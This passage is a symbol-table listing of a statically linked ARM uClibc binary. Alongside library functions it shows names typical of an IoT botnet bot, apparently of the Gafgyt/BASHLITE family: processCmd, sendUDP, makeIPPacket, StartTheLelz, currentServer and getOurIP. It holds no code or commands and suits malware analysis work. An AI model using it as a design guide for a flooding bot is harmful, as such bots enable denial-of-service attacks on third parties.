  1477.  1404: 0003168c     4 OBJECT  GLOBAL DEFAULT    9 __malloc_heap
  1478.  1405: 0001720c    48 FUNC    GLOBAL DEFAULT    2 sigaddset
  1479.  1406: 000227e8     4 OBJECT  GLOBAL DEFAULT    4 __linuxthreads_pthread_ke
  1480.  1407: 00016e58   108 FUNC    GLOBAL HIDDEN     2 __GI_tcgetattr
  1481.  1408: 00039adc     4 OBJECT  GLOBAL DEFAULT   10 __environ
  1482.  1409: 00015980    96 FUNC    GLOBAL DEFAULT    2 mmap
  1483.  1410: 0001e774    84 FUNC    GLOBAL DEFAULT    2 xdr_vector
  1484.  1411: 00019eac    76 FUNC    GLOBAL HIDDEN     2 __GI_clntudp_create
  1485.  1412: 0001272c   200 FUNC    GLOBAL DEFAULT    2 __pthread_alt_unlock
  1486.  1413: 0001ae28   416 FUNC    GLOBAL DEFAULT    2 svc_getreq_common
  1487.  1414: 0001f5d0   188 FUNC    GLOBAL DEFAULT    2 wcsnrtombs
  1488.  1415: 00014c20   256 FUNC    GLOBAL DEFAULT    2 pthread_detach
  1489.  1416: 0000ad48   276 FUNC    GLOBAL DEFAULT    2 makeIPPacket
  1490.  1417: 00008d54   220 FUNC    GLOBAL DEFAULT    2 sockprintf
  1491.  1418: 00016fb4    12 FUNC    GLOBAL HIDDEN     2 __GI_inet_ntoa
  1492.  1419: 000128a4    84 FUNC    WEAK   DEFAULT    2 send
  1493.  1420: 0001b028    68 FUNC    GLOBAL DEFAULT    2 svc_getreq
  1494.  1421: 0002199c   304 FUNC    GLOBAL DEFAULT    2 __fgetc_unlocked
  1495.  1422: 00020884   256 FUNC    GLOBAL HIDDEN     2 __GI_clnt_spcreateerror
  1496.  1423: 00017884   328 FUNC    GLOBAL DEFAULT    2 abort
  1497.  1424: 0001c788    72 FUNC    GLOBAL DEFAULT    2 nrand48_r
  1498.  1425: 0001b194   144 FUNC    GLOBAL DEFAULT    2 xprt_unregister
  1499.  1426: 00013c64    16 FUNC    GLOBAL DEFAULT    2 pthread_attr_getschedpoli
  1500.  1427: 000172cc    60 FUNC    GLOBAL HIDDEN     2 __sigjmp_save
  1501.  1428: 00039dbc    24 OBJECT  GLOBAL HIDDEN    10 __libc_drand48_data
  1502.  1429: 0002d080 16384 OBJECT  GLOBAL DEFAULT    9 __pthread_handles
  1503.  1430: 00015b20   116 FUNC    WEAK   HIDDEN     2 __GI_fcntl
  1504.  1431: 0001f5b0    32 FUNC    GLOBAL HIDDEN     2 __GI_wcsrtombs
  1505.  1432: 00016a1c   172 FUNC    GLOBAL HIDDEN     2 __GI_fwrite_unlocked
  1506.  1433: 00039ce8     4 OBJECT  GLOBAL DEFAULT   10 __libc_tsd_RPC_VARS_data
  1507.  1434: 00018b58    44 FUNC    GLOBAL HIDDEN     2 __GI_getgid
  1508.  1435: 00017d3c   204 FUNC    GLOBAL DEFAULT    2 srandom_r
  1509.  1436: 0001dbf8   140 FUNC    GLOBAL HIDDEN     2 __GI_fputs
  1510.  1437: 0001ba74    56 FUNC    GLOBAL DEFAULT    2 xdr_char
  1511.  1438: 00008094     4 FUNC    GLOBAL DEFAULT    1 _init
  1512.  1439: 00016500    44 FUNC    GLOBAL HIDDEN     2 __GI_setrlimit
  1513.  1440: 00020984    28 FUNC    GLOBAL DEFAULT    2 clnt_pcreateerror
  1514.  1441: 00016f34   128 FUNC    GLOBAL HIDDEN     2 __GI_inet_ntoa_r
  1515.  1442: 00017bec   192 FUNC    GLOBAL HIDDEN     2 __GI_setstate_r
  1516.  1443: 00013ce0    20 FUNC    WEAK   DEFAULT    2 pthread_attr_setstackaddr
  1517.  1444: 0000930c   128 FUNC    GLOBAL DEFAULT    2 parseHex
  1518.  1445: 00018014     8 FUNC    GLOBAL DEFAULT    2 strtol
  1519.  1446: 00015b08    16 FUNC    GLOBAL DEFAULT    2 __sigsetjmp
  1520.  1447: 000160c8    44 FUNC    GLOBAL DEFAULT    2 pipe
  1521.  1448: 00015eac   100 FUNC    GLOBAL DEFAULT    2 __libc_lseek64
  1522.  1449: 00013b70   172 FUNC    GLOBAL HIDDEN     2 __GI_pthread_getschedpara
  1523.  1450: 0001b444   588 FUNC    GLOBAL HIDDEN     2 _svcauth_unix
  1524.  1451: 0001de40   224 FUNC    GLOBAL DEFAULT    2 strnlen
  1525.  1452: 0001dcd0   184 FUNC    GLOBAL DEFAULT    2 rawmemchr
  1526.  1453: 000195dc    24 FUNC    GLOBAL HIDDEN     2 __GI_mempcpy
  1527.  1454: 00012a48    76 FUNC    WEAK   DEFAULT    2 accept
  1528.  1455: 0001304c    84 FUNC    GLOBAL DEFAULT    2 __libc_allocate_rtsig
  1529.  1456: 00013b70   172 FUNC    GLOBAL DEFAULT    2 pthread_getschedparam
  1530.  1457: 000227ec   768 OBJECT  GLOBAL HIDDEN     4 __GI___C_ctype_b_data
  1531.  1458: 00016274    56 FUNC    GLOBAL DEFAULT    2 __libc_pread64
  1532.  1459: 0001aa74   108 FUNC    GLOBAL HIDDEN     2 __GI_xdr_replymsg
  1533.  1460: 0001c77c    12 FUNC    GLOBAL HIDDEN     2 __GI_lrand48_r
  1534.  1461: 000173e4    36 FUNC    GLOBAL DEFAULT    2 __sigaddset
  1535.  1462: 0001e1ec   156 FUNC    GLOBAL HIDDEN     2 __GI_xdr_authunix_parms
  1536.  1463: 00014084    92 FUNC    GLOBAL DEFAULT    2 pthread_setcancelstate
  1537.  1464: 0001bc40   136 FUNC    GLOBAL DEFAULT    2 xdr_union
  1538.  1465: 00031480   184 OBJECT  GLOBAL DEFAULT    9 __pthread_functions
  1539.  1466: 00012e24    68 FUNC    GLOBAL DEFAULT    2 nanosleep
  1540.  1467: 00017124    44 FUNC    WEAK   HIDDEN     2 __GI_send
  1541.  1468: 000132a8    96 FUNC    GLOBAL DEFAULT    2 __pthread_wait_for_restar
  1542.  1469: 0001bb74     4 FUNC    GLOBAL DEFAULT    2 xdr_enum
  1543.  1470: 00037a94     4 OBJECT  GLOBAL DEFAULT   10 h_errno
  1544.  1471: 00017580    88 FUNC    GLOBAL DEFAULT    2 calloc
  1545.  1472: 0001acf0    52 FUNC    GLOBAL HIDDEN     2 __GI_svcerr_auth
  1546.  1473: 0001bae4   144 FUNC    GLOBAL DEFAULT    2 xdr_bool
  1547.  1474: 00014f80   200 FUNC    WEAK   HIDDEN     2 __pthread_mutex_unlock
  1548.  1475: 0001661c    44 FUNC    GLOBAL DEFAULT    2 wait4
  1549.  1476: 000181b4   148 FUNC    GLOBAL HIDDEN     2 __GI_exit
  1550.  1477: 00039ae4     4 OBJECT  GLOBAL HIDDEN    10 __app_fini
  1551.  1478: 00016500    44 FUNC    GLOBAL DEFAULT    2 setrlimit
  1552.  1479: 0000aae0   344 FUNC    GLOBAL DEFAULT    2 csum
  1553.  1480: 0001b6c0    72 FUNC    GLOBAL HIDDEN     2 __GI_xdr_long
  1554.  1481: 00039ad0     4 OBJECT  GLOBAL HIDDEN    10 __exit_cleanup
  1555.  1482: 00019050     0 FUNC    GLOBAL HIDDEN     2 _memcpy
  1556.  1483: 0001bde0    24 FUNC    GLOBAL DEFAULT    2 xdr_wrapstring
  1557.  1484: 0001aa08   108 FUNC    GLOBAL DEFAULT    2 xdr_rejected_reply
  1558.  1485: 0001899c    40 FUNC    GLOBAL HIDDEN     2 __GI___rpc_thread_createe
  1559.  1486: 0001827c   148 FUNC    GLOBAL HIDDEN     2 __GI_execl
  1560.  1487: 00017d3c   204 FUNC    GLOBAL HIDDEN     2 __GI_srandom_r
  1561.  1488: 0001427c     8 FUNC    GLOBAL DEFAULT    2 pthread_condattr_destroy
  1562.  1489: 000318b4     4 OBJECT  GLOBAL HIDDEN     9 __GI___ctype_tolower
  1563.  1490: 00013c9c    36 FUNC    GLOBAL DEFAULT    2 pthread_attr_setscope
  1564.  1491: 00012a94    76 FUNC    WEAK   DEFAULT    2 write
  1565.  1492: 00018848   260 FUNC    GLOBAL HIDDEN     2 __rpc_thread_variables
  1566.  1493: 00039adc     4 OBJECT  WEAK   DEFAULT   10 environ
  1567.  1494: 00015c64    44 FUNC    WEAK   HIDDEN     2 __GI_close
  1568.  1495: 0001b690    40 FUNC    GLOBAL DEFAULT    2 xdr_free
  1569.  1496: 0001bee0    16 FUNC    GLOBAL DEFAULT    2 xdr_netobj
  1570.  1497: 0001f860    48 FUNC    GLOBAL DEFAULT    2 fprintf
  1571.  1498: 00031898    24 OBJECT  GLOBAL DEFAULT    9 __resolv_lock
  1572.  1499: 00015e80    44 FUNC    GLOBAL DEFAULT    2 kill
  1573.  1500: 000169e8    52 FUNC    GLOBAL DEFAULT    2 fputs_unlocked
  1574.  1501: 000153b0   196 FUNC    WEAK   HIDDEN     2 __pthread_mutex_trylock
  1575.  1502: 000156a4   244 FUNC    GLOBAL DEFAULT    2 __pthread_destroy_specifi
  1576.  1503: 0001e06c    92 FUNC    GLOBAL DEFAULT    2 ffs
  1577.  1504: 0001b0f0   164 FUNC    GLOBAL DEFAULT    2 svc_register
  1578.  1505: 0001b6c0    72 FUNC    GLOBAL DEFAULT    2 xdr_long
  1579.  1506: 00014e60    24 FUNC    WEAK   DEFAULT    2 pthread_mutexattr_setkind
  1580.  1507: 0001ac50    80 FUNC    GLOBAL HIDDEN     2 __GI_svcerr_decode
  1581.  1508: 0001c9f4    60 FUNC    GLOBAL HIDDEN     2 __GI_brk
  1582.  1509: 0001f42c    44 FUNC    GLOBAL DEFAULT    2 bind
  1583.  1510: 0001b43c     8 FUNC    GLOBAL HIDDEN     2 _svcauth_short
  1584.  1511: 00012e24    68 FUNC    WEAK   HIDDEN     2 __GI_nanosleep
  1585.  1512: 00016e1c    12 FUNC    GLOBAL HIDDEN     2 __GI_strtok
  1586.  1513: 00010700   204 FUNC    GLOBAL DEFAULT    2 __umodsi3
  1587.  1514: 0001aca0    80 FUNC    GLOBAL DEFAULT    2 svcerr_systemerr
  1588.  1515: 00031564     4 OBJECT  GLOBAL DEFAULT    9 _stdio_openlist
  1589.  1516: 00016558    84 FUNC    GLOBAL HIDDEN     2 __GI_sigprocmask
  1590.  1517: 00016fc0    36 FUNC    GLOBAL DEFAULT    2 inet_addr
  1591.  1518: 00016ec4    36 FUNC    GLOBAL DEFAULT    2 ntohl
  1592.  1519: 0001ca88    12 FUNC    GLOBAL HIDDEN     2 __GI_fseek
  1593.  1520: 00039c34     4 OBJECT  GLOBAL DEFAULT   10 __pthread_nonstandard_sta
  1594.  1521: 00019c40   620 FUNC    GLOBAL HIDDEN     2 __GI_clntudp_bufcreate
  1595.  1522: 00016060    60 FUNC    GLOBAL HIDDEN     2 __GI___libc_open64
  1596.  1523: 000142f4    88 FUNC    GLOBAL DEFAULT    2 pthread_cond_broadcast
  1597.  1524: 00015224   316 FUNC    GLOBAL DEFAULT    2 pthread_once
  1598.  1525: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __deregister_frame_info
  1599.  1526: 00014eb0    84 FUNC    GLOBAL DEFAULT    2 __pthread_once_fork_child
  1600.  1527: 00039c28     4 OBJECT  GLOBAL DEFAULT   10 ourIP
  1601.  1528: 00021e4c     0 FUNC    GLOBAL DEFAULT    2 __aeabi_idiv
  1602.  1529: 00015c38    44 FUNC    GLOBAL DEFAULT    2 chdir
  1603.  1530: 00013c74    24 FUNC    GLOBAL DEFAULT    2 pthread_attr_setinheritsc
  1604.  1531: 0001255c   116 FUNC    GLOBAL DEFAULT    2 __pthread_alt_lock
  1605.  1532: 0001e54c   236 FUNC    GLOBAL DEFAULT    2 pmap_unset
  1606.  1533: 000109a0    92 FUNC    GLOBAL DEFAULT    2 __pthread_manager_adjust_
  1607.  1534: 0001ca88    12 FUNC    GLOBAL DEFAULT    2 fseeko
  1608.  1535: 00037a9c     4 OBJECT  GLOBAL DEFAULT   10 _stdio_openlist_del_count
  1609.  1536: 00009c8c   640 FUNC    GLOBAL DEFAULT    2 connectTimeout
  1610.  1537: 00031280   480 OBJECT  GLOBAL DEFAULT    9 __pthread_manager_thread
  1611.  1538: 00013170    20 FUNC    GLOBAL DEFAULT    2 __pthread_setconcurrency
  1612.  1539: 000171b0    48 FUNC    GLOBAL DEFAULT    2 setsockopt
  1613.  1540: 0001b708   144 FUNC    GLOBAL DEFAULT    2 xdr_short
  1614.  1541: 00017308   184 FUNC    GLOBAL DEFAULT    2 bsd_signal
  1615.  1542: 0001ca88    12 FUNC    GLOBAL DEFAULT    2 fseek
  1616.  1543: 00013aac   196 FUNC    GLOBAL DEFAULT    2 pthread_setschedparam
  1617.  1544: 00015e80    44 FUNC    GLOBAL HIDDEN     2 __GI_kill
  1618.  1545: 00016b80    28 FUNC    GLOBAL HIDDEN     2 __GI_strcmp
  1619.  1546: 0001afc8    96 FUNC    GLOBAL DEFAULT    2 svc_getreqset
  1620.  1547: 0001dcc0     4 FUNC    GLOBAL HIDDEN     2 __GI_memmove
  1621.  1548: 00017a4c   140 FUNC    GLOBAL DEFAULT    2 setstate
  1622.  1549: 00021bf0   204 FUNC    GLOBAL HIDDEN     2 __decode_dotted
  1623.  1550: 000142f4    88 FUNC    GLOBAL HIDDEN     2 __GI_pthread_cond_broadca
  1624.  1551: 00013ea0    76 FUNC    GLOBAL DEFAULT    2 __pthread_perform_cleanup
  1625.  1552: 00021d08    92 FUNC    GLOBAL HIDDEN     2 __stdio_READ
  1626.  1553: 000158ec   148 FUNC    GLOBAL DEFAULT    2 pthread_key_create
  1627.  1554: 000194e0   252 FUNC    WEAK   DEFAULT    2 memchr
  1628.  1555: 00016694    52 FUNC    GLOBAL HIDDEN     2 __GI_toupper
  1629.  1556: 00013a90    28 FUNC    GLOBAL DEFAULT    2 __pthread_initialize_mini
  1630.  1557: 00017098    44 FUNC    WEAK   HIDDEN     2 __GI_recv
  1631.  1558: 0001b224   128 FUNC    GLOBAL DEFAULT    2 svc_getreq_poll
  1632.  1559: 00039dd4     0 NOTYPE  GLOBAL DEFAULT  ABS __bss_end__
  1633.  1560: 0003155c     4 OBJECT  GLOBAL DEFAULT    9 __stdin
  1634.  1561: 00031550     4 OBJECT  GLOBAL DEFAULT    9 stdin
  1635.  1562: 000207dc    76 FUNC    GLOBAL HIDDEN     2 __GI_clnt_sperrno
  1636.  1563: 00011c58   320 FUNC    GLOBAL DEFAULT    2 __new_sem_wait
  1637.  1564: 00012b2c    60 FUNC    WEAK   DEFAULT    2 wait
  1638.  1565: 0001ab18   140 FUNC    GLOBAL DEFAULT    2 xdr_accepted_reply
  1639.  1566: 00016e28    32 FUNC    GLOBAL HIDDEN     2 __GI_isatty
  1640.  1567: 00016060    60 FUNC    GLOBAL DEFAULT    2 __libc_open64
  1641.  1568: 00013170    20 FUNC    WEAK   DEFAULT    2 pthread_setconcurrency
  1642.  1569: 0001198c    84 FUNC    WEAK   DEFAULT    2 sem_init
  1643.  1570: 0001ad24     8 FUNC    GLOBAL DEFAULT    2 svcerr_weakauth
  1644.  1571: 0001e1ec   156 FUNC    GLOBAL DEFAULT    2 xdr_authunix_parms
  1645.  1572: 00014df4    84 FUNC    WEAK   HIDDEN     2 __pthread_mutex_destroy
  1646.  1573: 00014e78    16 FUNC    GLOBAL DEFAULT    2 __pthread_mutexattr_getki
  1647.  1574: 00031080     4 OBJECT  GLOBAL DEFAULT    9 __pthread_handles_num
  1648.  1575: 00008190     0 FUNC    GLOBAL DEFAULT    2 _start
  1649.  1576: 000118e0    24 FUNC    GLOBAL DEFAULT    2 sem_close
  1650.  1577: 0001aae8    48 FUNC    GLOBAL HIDDEN     2 __GI_xdr_opaque_auth
  1651.  1578: 00016d24   248 FUNC    GLOBAL DEFAULT    2 strstr
  1652.  1579: 00015e30    80 FUNC    GLOBAL HIDDEN     2 __GI_ioctl
  1653.  1580: 0001b9e4     4 FUNC    GLOBAL DEFAULT    2 xdr_u_longlong_t
  1654.  1581: 000081cc   212 FUNC    GLOBAL DEFAULT    2 init_rand
  1655.  1582: 000179cc     4 FUNC    GLOBAL DEFAULT    2 rand
  1656.  1583: 000122b8   140 FUNC    GLOBAL DEFAULT    2 pthread_kill
  1657.  1584: 00017308   184 FUNC    GLOBAL DEFAULT    2 signal
  1658.  1585: 00012be0    76 FUNC    WEAK   DEFAULT    2 read
  1659.  1586: 0001b798     4 FUNC    GLOBAL HIDDEN     2 __GI_xdr_int
  1660.  1587: 00031464     4 OBJECT  GLOBAL DEFAULT    9 __pthread_manager_request
  1661.  1588: 00015620    24 FUNC    WEAK   DEFAULT    2 __pthread_internal_tsd_ge
  1662.  1589: 00021324   184 FUNC    GLOBAL HIDDEN     2 __decode_header
  1663.  1590: 00012c80   108 FUNC    WEAK   DEFAULT    2 pread64
  1664.  1591: 000227d8     4 OBJECT  GLOBAL DEFAULT    4 __linuxthreads_pthread_si
  1665.  1592: 00013d04    24 FUNC    WEAK   DEFAULT    2 pthread_attr_setstacksize
  1666.  1593: 00009830   232 FUNC    GLOBAL DEFAULT    2 getCores
  1667.  1594: 0001f554    12 FUNC    WEAK   HIDDEN     2 __GI___h_errno_location
  1668.  1595: 0001baac    56 FUNC    GLOBAL DEFAULT    2 xdr_u_char
  1669.  1596: 00016ad0     4 FUNC    GLOBAL HIDDEN     2 __GI_memcpy
  1670.  1597: 00012858    76 FUNC    WEAK   DEFAULT    2 sendmsg
  1671.  1598: 00016b80    28 FUNC    GLOBAL DEFAULT    2 strcoll
  1672.  1599: 00019eac    76 FUNC    GLOBAL DEFAULT    2 clntudp_create
  1673.  1600: 0001a980   136 FUNC    GLOBAL HIDDEN     2 __GI_xdr_callhdr
  1674.  1601: 0001f5b0    32 FUNC    GLOBAL DEFAULT    2 wcsrtombs
  1675.  1602: 00031598     4 OBJECT  GLOBAL DEFAULT    9 _stdio_user_locking
  1676.  1603: 00015608    24 FUNC    WEAK   DEFAULT    2 __pthread_internal_tsd_ad
  1677.  1604: 0001ca30    88 FUNC    GLOBAL DEFAULT    2 __cmsg_nxthdr
  1678.  1605: 0001ad2c    76 FUNC    GLOBAL HIDDEN     2 __GI_svcerr_noprog
  1679.  1606: 0001723c    48 FUNC    GLOBAL HIDDEN     2 __GI_sigdelset
  1680.  1607: 0001dd88   184 FUNC    GLOBAL DEFAULT    2 strncpy
  1681.  1608: 00021acc   124 FUNC    GLOBAL DEFAULT    2 strcasecmp
  1682.  1609: 00016efc    36 FUNC    GLOBAL DEFAULT    2 htonl
  1683.  1610: 000127f4   100 FUNC    WEAK   DEFAULT    2 sendto
  1684.  1611: 00039bf4     4 OBJECT  GLOBAL HIDDEN    10 __exit_count
  1685.  1612: 0001b79c   112 FUNC    GLOBAL DEFAULT    2 xdr_u_long
  1686.  1613: 00031548     4 OBJECT  GLOBAL DEFAULT    9 __C_ctype_toupper
  1687.  1614: 00016060    60 FUNC    WEAK   HIDDEN     2 __GI_open64
  1688.  1615: 0000aea8  9432 FUNC    GLOBAL DEFAULT    2 StartTheLelz
  1689.  1616: 000163c8    44 FUNC    GLOBAL DEFAULT    2 sched_get_priority_max
  1690.  1617: 00031540     4 OBJECT  GLOBAL HIDDEN     9 __GI___C_ctype_b
  1691.  1618: 0001aa74   108 FUNC    GLOBAL DEFAULT    2 xdr_replymsg
  1692.  1619: 00012374   196 FUNC    GLOBAL DEFAULT    2 pthread_sigmask
  1693.  1620: 0001c5d8   280 FUNC    GLOBAL DEFAULT    2 realloc
  1694.  1621: 00018248    52 FUNC    GLOBAL DEFAULT    2 on_exit
  1695.  1622: 00015f10    52 FUNC    GLOBAL DEFAULT    2 __libc_siglongjmp
  1696.  1623: 000126f0    60 FUNC    GLOBAL DEFAULT    2 __pthread_compare_and_swa
  1697.  1624: 0001c264   884 FUNC    GLOBAL HIDDEN     2 __GI_gethostbyname_r
  1698.  1625: 000147b0    80 FUNC    GLOBAL HIDDEN     2 __GI_pthread_cond_signal
  1699.  1626: 0001dd88   184 FUNC    GLOBAL HIDDEN     2 __GI_strncpy
  1700.  1627: 00017124    44 FUNC    GLOBAL DEFAULT    2 __libc_send
  1701.  1628: 0001df84   232 FUNC    GLOBAL HIDDEN     2 __GI___xpg_strerror_r
  1702.  1629: 0002d034     4 OBJECT  GLOBAL DEFAULT    9 currentServer
  1703.  1630: 00013ce0    20 FUNC    GLOBAL DEFAULT    2 __pthread_attr_setstackad
  1704.  1631: 000318b0     4 OBJECT  GLOBAL HIDDEN     9 __GI___C_ctype_tolower
  1705.  1632: 000170c4    52 FUNC    WEAK   HIDDEN     2 __GI_recvfrom
  1706.  1633: 00014248    24 FUNC    GLOBAL DEFAULT    2 pthread_cond_init
  1707.  1634: 00015dd8    44 FUNC    GLOBAL HIDDEN     2 __GI_getrlimit
  1708.  1635: 00016d08    28 FUNC    GLOBAL HIDDEN     2 __GI_strcpy
  1709.  1636: 00020fdc   608 FUNC    GLOBAL HIDDEN     2 __GI_inet_ntop
  1710.  1637: 00016e1c    12 FUNC    GLOBAL DEFAULT    2 strtok
  1711.  1638: 000168e4   260 FUNC    GLOBAL HIDDEN     2 __GI___fputc_unlocked
  1712.  1639: 00017284    24 FUNC    GLOBAL DEFAULT    2 sigfillset
  1713.  1640: 0001dc90    44 FUNC    GLOBAL DEFAULT    2 memcmp
  1714.  1641: 0001ad2c    76 FUNC    GLOBAL DEFAULT    2 svcerr_noprog
  1715.  1642: 000163f4    44 FUNC    GLOBAL DEFAULT    2 sched_get_priority_min
  1716.  1643: 0001cc00   204 FUNC    GLOBAL HIDDEN     2 __stdio_adjust_position
  1717.  1644: 0001bb78   200 FUNC    GLOBAL DEFAULT    2 xdr_opaque
  1718.  1645: 0001ce88  1524 FUNC    GLOBAL HIDDEN     2 _vfprintf_internal
  1719.  1646: 000160f4    44 FUNC    WEAK   HIDDEN     2 __GI_poll
  1720.  1647: 0001c788    72 FUNC    GLOBAL HIDDEN     2 __GI_nrand48_r
  1721.  1648: 000115c8   404 FUNC    GLOBAL DEFAULT    2 fork
  1722.  1649: 00031474     4 OBJECT  GLOBAL DEFAULT    9 __pthread_restart
  1723.  1650: 00013c4c    24 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_setsche
  1724.  1651: 000108b0     4 FUNC    GLOBAL DEFAULT    2 __aeabi_ldiv0
  1725.  1652: 00014e88    12 FUNC    WEAK   DEFAULT    2 pthread_mutexattr_getpsha
  1726.  1653: 00013c74    24 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_setinhe
  1727.  1654: 00021d64    44 FUNC    GLOBAL HIDDEN     2 __stdio_rfill
  1728.  1655: 000206e4   200 FUNC    GLOBAL DEFAULT    2 strncat
  1729.  1656: 00013cc0    16 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_getscop
  1730.  1657: 0001e288   348 FUNC    GLOBAL HIDDEN     2 __GI_bindresvport
  1731.  1658: 000318dc     4 OBJECT  GLOBAL DEFAULT   10 gotIP
  1732.  1659: 0001609c    44 FUNC    GLOBAL DEFAULT    2 __libc_pause
  1733.  1660: 00011944    72 FUNC    WEAK   DEFAULT    2 sem_trywait
  1734.  1661: 00018310   420 FUNC    GLOBAL HIDDEN     2 __GI_sleep
  1735.  1662: 00012018   304 FUNC    GLOBAL DEFAULT    2 sigaction
  1736.  1663: 00039d90     4 OBJECT  GLOBAL DEFAULT   10 _dl_phdr
  1737.  1664: 00014e48    16 FUNC    WEAK   HIDDEN     2 __pthread_mutexattr_init
  1738.  1665: 0001aba4    92 FUNC    GLOBAL HIDDEN     2 __GI_svc_sendreply
  1739.  1666: 0002199c   304 FUNC    GLOBAL HIDDEN     2 __GI_getc_unlocked
  1740.  1667: 00015b94    80 FUNC    GLOBAL HIDDEN     2 __GI___libc_fcntl64
  1741.  1668: 00018570    92 FUNC    GLOBAL DEFAULT    2 __uClibc_init
  1742.  1669: 0001a980   136 FUNC    GLOBAL DEFAULT    2 xdr_callhdr
  1743.  1670: 00015f9c    44 FUNC    GLOBAL HIDDEN     2 __GI_munmap
  1744.  1671: 0001fbf8    52 FUNC    GLOBAL HIDDEN     2 _store_inttype
  1745.  1672: 00021cbc    76 FUNC    GLOBAL HIDDEN     2 __length_dotted
  1746.  1673: 00015d68    24 FUNC    GLOBAL DEFAULT    2 __getpagesize
  1747.  1674: 000179d0   124 FUNC    GLOBAL HIDDEN     2 __GI_random
  1748.  1675: 00018a98    28 FUNC    GLOBAL HIDDEN     2 __syscall_error
  1749.  1676: 00031878     4 OBJECT  GLOBAL HIDDEN     9 __uclibc_progname
  1750.  1677: 00018b2c    44 FUNC    GLOBAL HIDDEN     2 __GI_getegid
  1751.  1678: 0001661c    44 FUNC    GLOBAL HIDDEN     2 __GI_wait4
  1752.  1679: 000185cc   588 FUNC    GLOBAL DEFAULT    2 __uClibc_main
  1753.  1680: 00018bb0    88 FUNC    GLOBAL DEFAULT    2 sbrk
  1754.  1681: 00039ae8     4 OBJECT  GLOBAL HIDDEN    10 __rtld_fini
  1755.  1682: 0001ad78    96 FUNC    GLOBAL HIDDEN     2 __GI_svcerr_progvers
  1756.  1683: 00015cbc    44 FUNC    WEAK   HIDDEN     2 __GI_fork
  1757.  1684: 000207ac    48 FUNC    WEAK   DEFAULT    2 strdup
  1758.  1685: 00015c64    44 FUNC    GLOBAL DEFAULT    2 __libc_close
  1759.  1686: 00015638    32 FUNC    WEAK   DEFAULT    2 __pthread_internal_tsd_se
  1760.  1687: 00015d80    44 FUNC    WEAK   HIDDEN     2 __GI_getpid
  1761.  1688: 0001c178   236 FUNC    GLOBAL DEFAULT    2 inet_aton
  1762.  1689: 00014284    12 FUNC    GLOBAL DEFAULT    2 pthread_condattr_getpshar
  1763.  1690: 00016c00   264 FUNC    WEAK   DEFAULT    2 index
  1764.  1691: 00013eec    76 FUNC    WEAK   DEFAULT    2 _pthread_cleanup_push_def
  1765.  1692: 0000eb7c  3052 FUNC    GLOBAL DEFAULT    2 processCmd
  1766.  1693: 000173c0    36 FUNC    GLOBAL DEFAULT    2 __sigismember
  1767.  1694: 00015e04    44 FUNC    GLOBAL DEFAULT    2 gettimeofday
  1768.  1695: 0001f80c    12 FUNC    GLOBAL DEFAULT    2 fopen
  1769.  1696: 000318bc     0 NOTYPE  GLOBAL DEFAULT  ABS __bss_start
  1770.  1697: 0001315c    16 FUNC    GLOBAL HIDDEN     2 __GI_pthread_self
  1771.  1698: 00015ff4    92 FUNC    GLOBAL DEFAULT    2 __libc_open
  1772.  1699: 0000f934   740 FUNC    GLOBAL DEFAULT    2 getOurIP
  1773.  1700: 00016ae0   156 FUNC    GLOBAL DEFAULT    2 memset
  1774.  1701: 000171e0    44 FUNC    GLOBAL HIDDEN     2 __GI_socket
  1775.  1702: 0000fc18  2520 FUNC    GLOBAL DEFAULT    2 main
  1776.  1703: 00015f44    44 FUNC    GLOBAL HIDDEN     2 __GI___libc_lseek
  1777.  1704: 0001df70    20 FUNC    GLOBAL DEFAULT    2 __glibc_strerror_r
  1778.  1705: 00017284    24 FUNC    GLOBAL HIDDEN     2 __GI_sigfillset
  1779.  1706: 00019794    56 FUNC    GLOBAL HIDDEN     2 __rpc_thread_clnt_cleanup
  1780.  1707: 000108b0     4 FUNC    GLOBAL DEFAULT    2 __div0
  1781.  1708: 00009f0c   408 FUNC    GLOBAL DEFAULT    2 listFork
  1782.  1709: 00024100   768 OBJECT  GLOBAL HIDDEN     4 __GI___C_ctype_tolower_da
  1783.  1710: 0001bc40   136 FUNC    GLOBAL HIDDEN     2 __GI_xdr_union
  1784.  1711: 00018cc4   312 FUNC    GLOBAL HIDDEN     2 __stdio_fwrite
  1785.  1712: 0000a0a4   396 FUNC    GLOBAL DEFAULT    2 negotiate
  1786.  1713: 00017b70   124 FUNC    GLOBAL DEFAULT    2 srand
  1787.  1714: 00018974    40 FUNC    GLOBAL DEFAULT    2 __rpc_thread_svc_pollfd
  1788.  1715: 000105f0     0 FUNC    GLOBAL DEFAULT    2 __aeabi_uidiv
  1789.  1716: 00017ad8   152 FUNC    GLOBAL DEFAULT    2 initstate
  1790.  1717: 0001f68c   384 FUNC    GLOBAL DEFAULT    2 fclose
  1791.  1718: 00013c9c    36 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_setscop
  1792.  1719: 00015be4    44 FUNC    GLOBAL HIDDEN     2 __syscall_rt_sigaction
  1793.  1720: 00012d74    88 FUNC    WEAK   DEFAULT    2 open64
  1794.  1721: 0001bcc8   280 FUNC    GLOBAL DEFAULT    2 xdr_string
  1795.  1722: 00016ee8    20 FUNC    GLOBAL DEFAULT    2 ntohs
  1796.  1723: 00014e60    24 FUNC    GLOBAL DEFAULT    2 pthread_mutexattr_settype
  1797.  1724: 0000d380  1632 FUNC    GLOBAL DEFAULT    2 sendUDP
  1798.  1725: 00016fb4    12 FUNC    GLOBAL DEFAULT    2 inet_ntoa
  1799.  1726: 00015dac    44 FUNC    GLOBAL DEFAULT    2 getppid
  1800.  1727: 00016e58   108 FUNC    GLOBAL DEFAULT    2 tcgetattr
  1801.  1728: 00024100   768 OBJECT  GLOBAL DEFAULT    4 __C_ctype_tolower_data
  1802.  1729: 000170c4    52 FUNC    GLOBAL DEFAULT    2 __libc_recvfrom
  1803.  1730: 000165dc    44 FUNC    GLOBAL DEFAULT    2 time
  1804.  1731: 00039c38     8 OBJECT  GLOBAL DEFAULT   10 __pthread_threads_events
  1805.  1732: 00017ed0   312 FUNC    GLOBAL DEFAULT    2 __libc_system
  1806.  1733: 00017884   328 FUNC    GLOBAL HIDDEN     2 __GI_abort
  1807.  1734: 00014e94    28 FUNC    WEAK   DEFAULT    2 pthread_mutexattr_setpsha
  1808.  1735: 000160f4    44 FUNC    WEAK   DEFAULT    2 poll
  1809.  1736: 00039dd4     0 NOTYPE  GLOBAL DEFAULT  ABS __end__
  1810.  1737: 00014618   408 FUNC    GLOBAL HIDDEN     2 __GI_pthread_cond_wait
